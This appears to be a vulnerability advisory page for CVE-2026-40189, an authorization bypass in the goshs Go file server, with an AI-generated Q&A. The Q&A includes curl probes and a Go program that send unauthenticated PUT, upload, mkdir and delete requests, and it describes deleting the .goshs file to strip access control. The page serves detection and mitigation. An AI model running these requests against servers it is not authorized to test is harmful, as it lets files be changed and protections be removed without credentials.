CVE-2026-40189
Authorization Bypass in goshs Allows Unauthenticated File Manipulation

Publication date: 2026-04-10

Last updated on: 2026-04-14

Assigner: GitHub, Inc.

Description
goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.4, goshs enforces the documented per-folder .goshs ACL/basic-auth mechanism for directory listings and file reads, but it does not enforce the same authorization checks for state-changing routes. An unauthenticated attacker can upload files with PUT, upload files with multipart POST /upload, create directories with ?mkdir, and delete files with ?delete inside a .goshs-protected directory. By deleting the .goshs file itself, the attacker can remove the folder's auth policy and then access previously protected content without credentials. This results in a critical authorization bypass affecting confidentiality, integrity, and availability. This vulnerability is fixed in 2.0.0-beta.4.
Meta Information
Published: 2026-04-10
Last Modified: 2026-04-14
Generated: 2026-05-06
AI Q&A: 2026-04-10
EPSS Evaluated: 2026-05-05
Also tracked in: NVD, EUVD
Affected Vendors & Products
Showing 4 associated CPEs

Vendor   Product   Version / Range
goshs    goshs     2.0.0
goshs    goshs     up to 2.0.0 (excluding 2.0.0)
goshs    goshs     2.0.0
goshs    goshs     2.0.0

The CPE entries are listed without pre-release identifiers; per the description above, the affected range is every version before 2.0.0-beta.4.
CWE
CWE-862: The product does not perform an authorization check when an actor attempts to access a resource or perform an action.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-40189 is a critical authorization bypass vulnerability in goshs, a SimpleHTTPServer written in Go. The server uses per-folder .goshs ACL/basic-auth files to protect directory listings and file reads. However, before version 2.0.0-beta.4, goshs did not enforce these authorization checks on state-changing HTTP routes such as file uploads, directory creation, and file deletion.

This means an unauthenticated attacker could upload files using PUT or multipart POST /upload, create directories with the ?mkdir parameter, and delete files with the ?delete parameter inside directories protected by .goshs ACL files. Critically, the attacker could delete the .goshs ACL file itself, removing the folder's authentication policy and allowing unrestricted access to previously protected content.

This vulnerability results in a complete bypass of confidentiality, integrity, and availability protections for the affected directories.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

This vulnerability results in a critical authorization bypass that affects confidentiality, integrity, and availability of data stored in goshs-protected directories.

Because unauthorized attackers can upload, delete, or modify files and remove access control policies, sensitive data could be exposed or altered without proper authorization.

Such a failure to enforce authorization on state-changing operations can lead to violations of data protection requirements found in common standards and regulations like GDPR and HIPAA, which mandate strict controls over access to and modification of sensitive data.

Therefore, this vulnerability undermines compliance by allowing unauthorized access and modification of protected data, potentially resulting in data breaches and loss of data integrity.


How can this vulnerability impact me?

This vulnerability allows remote unauthenticated attackers to perform unauthorized state-changing operations within directories protected by .goshs ACL files.

  • Attackers can upload files using PUT or multipart POST /upload requests.
  • Attackers can create new directories using the ?mkdir query parameter.
  • Attackers can delete files, including the critical .goshs ACL file itself, using the ?delete query parameter.

By deleting the .goshs ACL file, attackers remove the folder's authentication policy, enabling them to access previously protected content without any credentials.

Overall, this leads to a complete compromise of confidentiality, integrity, and availability of the protected data and resources.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

The quickest check is the installed version: any goshs release before 2.0.0-beta.4 is affected. To confirm the behaviour on a running instance, test whether state-changing HTTP requests are accepted without credentials in a directory that contains a .goshs file. These probes modify the target, so run them against a test directory or a throwaway file name, and never delete or overwrite the .goshs file itself while testing.

  • First confirm that the directory really is protected: an unauthenticated GET of its listing should be refused (a basic-auth challenge, HTTP 401). If the listing is served, there is no ACL to bypass.
  • Try an unauthenticated PUT request to upload a file to the protected directory.
  • Try an unauthenticated multipart POST request to the /upload endpoint.
  • Attempt to create a directory using the ?mkdir query parameter without authentication.
  • Attempt to delete the file you just uploaded (not the .goshs ACL file) using the ?delete query parameter without authentication.

For example, using curl (-i shows the status line; quote the URLs so the shell does not interpret ? and &):

  • curl -i 'http://target/protected/path/'
  • curl -i -X PUT 'http://target/protected/path/probe.txt' -d 'test content'
  • curl -i -F 'file=@localfile' 'http://target/protected/path/upload'
  • curl -i 'http://target/protected/path/?mkdir=probe-dir'
  • curl -i 'http://target/protected/path/?delete=probe.txt'

If the first request is refused but any of the others returns a 2xx status and the file or directory actually appears (or disappears) on disk or in an authenticated listing, the vulnerability is present.
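The same checks as a small program, written in Go because goshs is a Go project. This is an added example, not code from this page or from goshs: it assumes the routes exactly as the description names them (PUT to the file path, multipart POST with a "file" field to the upload route used in the curl line above, ?mkdir and ?delete as GET query parameters), treats any 2xx as acceptance and 401/403 as a refusal, and only creates and deletes its own uniquely named marker file. The type and function names (ProbeResult, Probe, prober) are the example's own.

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"mime/multipart"
	"net/http"
	"net/url"
	"os"
	"strings"
	"time"
)

// ProbeResult records how the server answered each request sent without credentials.
type ProbeResult struct {
	ReadRequiresAuth bool // the directory listing was refused, so an ACL is in force
	PutAccepted      bool // an unauthenticated PUT was accepted
	UploadAccepted   bool // an unauthenticated multipart POST was accepted
	MkdirAccepted    bool // an unauthenticated ?mkdir was accepted
	DeleteAccepted   bool // an unauthenticated ?delete of our own marker was accepted
	Vulnerable       bool // reads are protected but at least one write went through
}

// accepted treats any 2xx status as "the server performed the action".
func accepted(code int) bool { return code >= 200 && code < 300 }

// prober sends requests with no Authorization header and keeps the first transport error.
type prober struct {
	c   *http.Client
	err error
}

// status returns the response status for one request, or 0 once an error is recorded.
func (p *prober) status(method, target string, body io.Reader, ctype string) int {
	if p.err != nil {
		return 0
	}
	req, err := http.NewRequest(method, target, body)
	if err == nil {
		if ctype != "" {
			req.Header.Set("Content-Type", ctype)
		}
		var resp *http.Response
		if resp, err = p.c.Do(req); err == nil {
			defer resp.Body.Close()
			io.Copy(io.Discard, resp.Body)
			return resp.StatusCode
		}
	}
	p.err = err
	return 0
}

// Probe checks one .goshs-protected directory. base is the server origin
// ("http://target:8000") and dir the protected directory ("/protected/").
// It creates a uniquely named marker file and directory, deletes its own
// marker file again, and never touches the .goshs file.
func Probe(c *http.Client, base, dir string) (ProbeResult, error) {
	p := &prober{c: c}
	var r ProbeResult
	dir = "/" + strings.Trim(dir, "/") + "/"
	marker := fmt.Sprintf("cve-2026-40189-probe-%d", time.Now().UnixNano())

	// 1. Reads must be refused without credentials, otherwise there is no ACL to bypass.
	code := p.status(http.MethodGet, base+dir, nil, "")
	r.ReadRequiresAuth = code == http.StatusUnauthorized || code == http.StatusForbidden

	// 2. PUT a marker file.
	r.PutAccepted = accepted(p.status(http.MethodPut, base+dir+marker+".txt", strings.NewReader("probe\n"), "text/plain"))

	// 3. Multipart POST to the upload route, with the "file" field name from the curl example above.
	var buf bytes.Buffer
	mw := multipart.NewWriter(&buf)
	fw, _ := mw.CreateFormFile("file", marker+".up")
	io.WriteString(fw, "probe\n")
	mw.Close()
	r.UploadAccepted = accepted(p.status(http.MethodPost, base+dir+"upload", &buf, mw.FormDataContentType()))

	// 4. ?mkdir of a marker directory (left in place; remove it by hand afterwards).
	r.MkdirAccepted = accepted(p.status(http.MethodGet, base+dir+"?mkdir="+url.QueryEscape(marker+".d"), nil, ""))

	// 5. ?delete of the marker file from step 2 (meaningful only if step 2 succeeded).
	r.DeleteAccepted = accepted(p.status(http.MethodGet, base+dir+"?delete="+url.QueryEscape(marker+".txt"), nil, ""))

	r.Vulnerable = r.ReadRequiresAuth &&
		(r.PutAccepted || r.UploadAccepted || r.MkdirAccepted || r.DeleteAccepted)
	return r, p.err
}

func main() {
	if len(os.Args) != 3 {
		fmt.Fprintln(os.Stderr, "usage: probe http://target:8000 /protected/")
		os.Exit(2)
	}
	r, err := Probe(&http.Client{Timeout: 10 * time.Second}, os.Args[1], os.Args[2])
	if err != nil {
		fmt.Fprintln(os.Stderr, "error:", err)
		os.Exit(1)
	}
	fmt.Printf("%+v\n", r)
}
```

Vulnerable is only set when the listing was refused and at least one write was accepted, so an unprotected directory (everything allowed) and a fixed server (everything refused) both report false; check the individual fields to see which route let the write through. Remove the marker directory by hand afterwards if MkdirAccepted is true.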


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include:

  • Upgrade goshs to version 2.0.0-beta.4 or later, where the vulnerability is fixed. This is the only complete remedy.
  • Until the upgrade is in place, limit who can reach the server: bind it to a trusted interface, firewall it, or front it with a reverse proxy that requires authentication for every method and query, not only for GET reads.
  • If you build goshs yourself or carry local patches, confirm that authorization is enforced on all state-changing routes (PUT, multipart POST /upload, ?mkdir, ?delete), that a .goshs policy applies to everything beneath its directory, and that .goshs files cannot be created, overwritten, or deleted through the HTTP interface.
  • After upgrading, inspect each protected directory for unexpected files or directories and for a missing or modified .goshs file, since an attacker may already have used the flaw.

These steps prevent unauthenticated attackers from bypassing authorization and protect the confidentiality, integrity, and availability of the protected directories.

